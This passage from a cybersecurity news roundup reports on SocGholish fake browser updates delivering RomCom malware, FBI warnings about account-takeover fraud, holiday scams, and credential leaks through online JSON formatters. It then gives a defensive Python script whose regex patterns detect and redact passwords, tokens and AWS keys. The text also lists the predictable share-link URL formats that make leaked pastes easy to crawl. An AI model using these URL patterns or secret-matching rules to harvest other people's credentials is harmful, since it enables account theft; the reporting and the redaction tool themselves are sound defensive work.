SocGholish (aka FakeUpdates), linked to a financially motivated operator tracked as TA569 (aka Gold Prelude, Mustard Tempest, Purple Vallhund, and UNC1543), serves as an initial access broker, allowing other threat actors to drop a wide range of payloads. Some of its known customers are Evil Corp, LockBit, Dridex, and Raspberry Robin. The attack chains typically involve serving fake browser update alerts for Google Chrome or Mozilla Firefox on legitimate-but-compromised websites to trick unsuspecting users into downloading malicious JavaScript that’s responsible for installing a loader, which then fetches additional malware. For the most part, the attacks single out websites that are poorly secured, taking advantage of known security vulnerabilities in plugins to inject JavaScript code that’s designed to display the pop-up and activate the infection chain.

RomCom (aka Nebulous Mantis, Storm-0978, Tropical Scorpius, UNC2596, or Void Rabisu), on the other hand, is the name assigned to a Russia-aligned threat actor that’s known to dabble in both cybercrime and espionage operations since at least 2022. The threat actor leverages several methods, including spear-phishing and zero-day exploits, to breach target networks and drop the eponymous remote access trojan (RAT) on victim machines. Attacks mounted by the hacking group have singled out entities in Ukraine, as well as NATO-related defense organizations. In the attack analyzed by Arctic Wolf, the fake update payload allows the threat actors to run commands on the compromised machine by means of a reverse shell established to a command-and-control (C2) server.

This includes conducting reconnaissance and dropping a custom Python backdoor codenamed VIPERTUNNEL. Also delivered is a RomCom-linked DLL loader that launches the Mythic Agent, a core component of the cross-platform, post-exploitation red-teaming framework Mythic, which communicates with a corresponding server to support command execution, file operations, and more. While the attack was ultimately unsuccessful and was blocked before it could progress any further, the development shows the RomCom threat actor’s continued interest in targeting Ukraine or entities providing assistance to the country, no matter how tenuous the connection may be. “The timeline from infection via [the fake update] to the delivery of RomCom’s loader was less than 30 minutes,” Faires said.

“Delivery is not made until the target’s Active Directory domain has been verified to match a known value provided by the threat actor.” “The widespread nature of SocGholish attacks and the relative speed at which the attack progresses from initial access to infection makes it a potent threat to organizations worldwide.”

FBI Reports $262M in ATO Fraud as Researchers Cite Growing AI Phishing and Holiday Scams

The U.S. Federal Bureau of Investigation (FBI) has warned that cybercriminals are impersonating financial institutions with an aim to steal money or sensitive information to facilitate account takeover (ATO) fraud schemes. The activity targets individuals, businesses, and organizations of varied sizes and across sectors, the agency said, adding the fraudulent schemes have led to more than $262 million in losses since the start of the year. The FBI said it has received over 5,100 complaints.

ATO fraud typically refers to attacks that enable threat actors to obtain unauthorized access to an online financial institution, payroll system, or health savings account to siphon data and funds for personal gain. The access is often obtained by approaching targets through social engineering techniques, such as texts, calls, and emails that prey on users’ fears, or via bogus websites. These methods make it possible for attackers to deceive users into providing their login credentials on a phishing site, in some instances, urging them to click on a link to report purported fraudulent transactions recorded against their accounts. “A cybercriminal manipulates the account owner into giving away their login credentials, including multi-factor authentication (MFA) code or One-Time Passcode (OTP), by impersonating a financial institution employee, customer support, or technical support personnel,” the FBI said.

“The cybercriminal then uses login credentials to log into the legitimate financial institution website and initiate a password reset, ultimately gaining full control of the accounts.” Other cases involve threat actors masquerading as financial institutions contacting account owners, claiming their information was used to make fraudulent purchases, including firearms, and then convincing them to provide their account information to a second cybercriminal impersonating law enforcement. The FBI said ATO fraud can also involve the use of Search Engine Optimization (SEO) poisoning to trick users looking for businesses on search engines into clicking on phony links that redirect to a lookalike site by means of malicious search engine ads. Regardless of the method used, the attacks have one aim: to seize control of the accounts and swiftly wire funds to other accounts under their control, and change the passwords, effectively locking out the account owner. The accounts to which the money is transferred are further linked to cryptocurrency wallets to convert them into digital assets and obscure the money trail.

To stay protected against the threat, users are advised to be careful when sharing information about themselves online or on social media, regularly monitor accounts for any financial irregularities, use unique, complex passwords, verify the URL of banking websites before signing in, and stay vigilant against phishing attacks and suspicious callers. “By openly sharing information like a pet’s name, schools you have attended, your date of birth, or information about your family members, you may give scammers the information they need to guess your password or answer your security questions,” the FBI said. “The large majority of ATO accounts referenced in the FBI announcement occur through compromised credentials used by threat actors intimately familiar with the internal processes and workflows for money movement within financial institutions,” Jim Routh, chief trust officer at Saviynt, said in a statement. “The most effective controls to prevent these attacks are manual (phone calls for verification) and SMS messages for approval.

The root cause continues to be the accepted use of credentials for cloud accounts despite having passwordless options available.” The development comes as Darktrace, Flashpoint, Forcepoint, Fortinet, and Zimperium have highlighted the major cybersecurity threats ahead of the holiday season, including Black Friday scams, QR code fraud, gift card draining, and high-volume phishing campaigns that mimic popular brands like Amazon and Temu. Many of these activities leverage artificial intelligence (AI) tools to produce highly persuasive phishing emails, fake websites, and social media ads, allowing even low-skill attackers to pull off attacks that appear trustworthy and increase the success rate of their campaigns. Fortinet FortiGuard Labs said it detected at least 750 malicious, holiday-themed domains registered over the last three months, with many using key terms like “Christmas,” “Black Friday,” and “Flash Sale.” “Over the last three months, more than 1.57 million login accounts tied to major e-commerce sites, available through stealer logs, were collected across underground markets,” the company said. Attackers have also been found actively exploiting security vulnerabilities across Adobe/Magento, Oracle E-Business Suite, WooCommerce, Bagisto, and other common e-commerce platforms.

Some of the exploited vulnerabilities include CVE-2025-54236, CVE-2025-61882, and CVE-2025-47569. According to Zimperium zLabs, there has been a 4x increase in mobile phishing (aka mishing) sites, with attackers leveraging trusted brand names to create urgency and deceive users into clicking, logging in, or downloading malicious updates. What’s more, Recorded Future has called attention to purchase scams where threat actors use fake e-commerce stores to steal victim data and authorize fraudulent payments for non-existent goods and services. It described the scams as a “major emerging fraud threat.” The scam operations, per the cybersecurity company, work in multi-stage attack funnels targeting specific victims using a traffic distribution system (TDS) to determine if they are deemed appropriate and initiate a redirect chain to lead them to the final stage, where the victim-authorized transaction takes place. The main advantage of this scam is that payments are authorized by the victims themselves, offering operators immediate financial payouts.

In contrast, other fraud attack vectors require considerable investment of time and resources to cash out stolen data. Select purchase scams have also been found to use transaction recovery services to attempt two sequential fraudulent transactions, thereby double-monetizing the card information. “A sophisticated dark web ecosystem allows threat actors to quickly establish new purchase scam infrastructure and amplify their impact,” the company said. “Promotional activities mirroring traditional marketing – including an offer to sell stolen card data on the dark web carding shop PP24 – are widespread in this underground.” “Threat actors fund ad campaigns with stolen payment cards to spread purchase scams, which in turn compromise more payment card data, fueling a continuing cycle of fraud.”


Years of JSONFormatter and CodeBeautify Leaks Expose Thousands of Passwords and API Keys

New research has found that organizations in various sensitive sectors, including governments, telecoms, and critical infrastructure, are pasting passwords and credentials into online tools like JSONformatter and CodeBeautify that are used to format and validate code. Cybersecurity company watchTowr Labs said it captured a dataset of over 80,000 files on these sites, uncovering thousands of usernames, passwords, repository authentication keys, Active Directory credentials, database credentials, FTP credentials, cloud environment keys, LDAP configuration information, helpdesk API keys, meeting room API keys, SSH session recordings, and all kinds of personal information. This includes five years of historical JSONFormatter content and one year of historical CodeBeautify content, totalling over 5GB worth of enriched, annotated JSON data. Organizations impacted by the leak span critical national infrastructure, government, finance, insurance, banking, technology, retail, aerospace, telecommunications, healthcare, education, travel, and, ironically, cybersecurity sectors.

“These tools are extremely popular, often appearing near the top of search results for terms like ‘JSON beautify’ and ‘best place to paste secrets’ (probably, unproven) – and used by a wide variety of organizations, organisms, developers, and administrators in both enterprise environments and for personal projects,” security researcher Jake Knott said in a report shared with The Hacker News. Both tools also offer the ability to save a formatted JSON structure or code, turning it into a semi-permanent, shareable link with others – effectively allowing anyone with access to the URL to access the data. As it happens, the sites not only provide a handy Recent Links page to list all recently saved links, but also follow a predictable URL format for the shareable link, thereby making it easier for a bad actor to retrieve all URLs using a simple crawler:

- https://jsonformatter.org/{id-here}
- https://jsonformatter.org/{formatter-type}/{id-here}
- https://codebeautify.org/{formatter-type}/{id-here}

Some examples of leaked information include Jenkins secrets, a cybersecurity company exposing encrypted credentials for sensitive configuration files, Know Your Customer (KYC) information associated with a bank, a major financial exchange’s AWS credentials linked to Splunk, and Active Directory credentials for a bank. To make matters worse, the company said it uploaded fake AWS access keys to one of these tools, and found bad actors attempting to abuse them 48 hours after they were saved.

This indicates that valuable information exposed through these sources is being scraped by other parties and tested, posing severe risks. “Mostly because someone is already exploiting it, and this is all really, really stupid,” Knott said. “We don’t need more AI-driven agentic agent platforms; we need fewer critical organizations pasting credentials into random websites.” When checked by The Hacker News, both JSONFormatter and CodeBeautify have temporarily disabled the save functionality, claiming they are “working on to make it better” and implementing “enhanced NSFW (Not Safe For Work) content prevention measures.” watchTowr said that the save functionality was disabled by these sites likely in response to the research. “We suspect this change occurred in September in response to communication from a number of the affected organizations we alerted,” it added.
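What a pre-paste check for this kind of leak can look like, as an added example written for this page (it is not watchTowr's tooling and not code from either site): it walks a JSON document, flags leaves whose key name or value shape looks like a credential, and returns a redacted copy that is safe to drop into an online formatter. The sample config, its key names and the AWS-style key value are all constructed.

```python
import json
import re
from typing import Any, List, Optional, Tuple

# Key names that commonly carry credentials in config blobs (matched case-insensitively).
SENSITIVE_KEY = re.compile(r"pass(word|wd)?|secret|token|api[_-]?key|private[_-]?key|credential", re.I)
# Value shapes recognisable regardless of the key name: AWS access key IDs and user:pass@ URLs.
VALUE_PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(AKIA|ASIA)[0-9A-Z]{16}\b"),
    "basic_auth_url": re.compile(r"[a-z][a-z0-9+.-]*://[^/\s:@]+:[^/\s@]+@"),
}

def classify(key: str, value: str) -> Optional[str]:
    """Return why a string leaf looks like a credential, or None if it does not."""
    if SENSITIVE_KEY.search(key):
        return "sensitive key name"
    for reason, pattern in VALUE_PATTERNS.items():
        if pattern.search(value):
            return reason
    return None

def scan(text: str) -> Tuple[List[Tuple[str, str]], str]:
    """Walk a JSON document; return ([(json_path, reason)], redacted_json_text)."""
    findings: List[Tuple[str, str]] = []
    def visit(node: Any, path: str) -> Any:
        if isinstance(node, dict):
            return {k: visit(v, f"{path}.{k}") for k, v in node.items()}
        if isinstance(node, list):
            return [visit(v, f"{path}[{i}]") for i, v in enumerate(node)]
        if isinstance(node, str) and node:
            reason = classify(path.rsplit(".", 1)[-1], node)  # key = last path component
            if reason:
                findings.append((path, reason))
                return "[REDACTED]"  # only flagged leaves are replaced; structure is kept
        return node
    redacted = json.dumps(visit(json.loads(text), "$"), indent=2)
    return findings, redacted

# Constructed sample config: the kind of blob that ends up pasted into an online formatter.
SAMPLE = json.dumps({
    "app": "inventory",
    "db": {"host": "db01.internal.example", "user": "svc_inv", "password": "Winter2025!"},
    "aws": {"region": "eu-west-1", "accessKeyId": "AKIAEXAMPLEEXAMPLE00"},
    "directory": "ldaps://bind_user:Hunter2@ldap.example:636",
    "ports": [443, 8443],
})

if __name__ == "__main__":
    for path, reason in scan(SAMPLE)[0]:
        print(f"{path}: {reason}")
```

The key-name rule catches the obvious `password` field, while the value rules catch the AWS access key ID stored under a neutral name and the bind password embedded in a URL; neither would be found by a key-name check alone.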
